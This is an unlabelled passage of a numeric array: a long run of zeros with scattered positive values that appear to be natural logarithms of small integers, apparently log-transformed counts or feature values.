0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 4.795790545596741, 0.0, 2.1972245773362196, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.9459101490553132, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0,\n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.044522437723423, 3.0841946160253872,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.8918202981106265,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0, 0.0, 3.58351893845611, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 4.007333185232471, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 3.7369991058576035, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.258096538021482, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.365976015021851, 0.0, \n 1.0986122886681098, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 4.418840607796598, 2.0794415416798357, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 1.7412592803704001,\n 0, 3.5263605246161616, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 8.317766166719343, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 3.9384838577066197, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 4.48863636973214, 0.0, 0.0, 3.6109179126442243, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 2.5649493574615367, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.550898738446989, 0.0,\n 0.0, 0.0, 4.1588830833596715, 12.46359237448458, 0.0, 0.0, 0.0, 0, \n 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 5.846735604451319, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.8398715690385097, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0,\n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 3.4011973816621555, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 4.06534854782536, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0, 4.672828834461906, 0, 2.550898738446989, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.3978952727983707, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 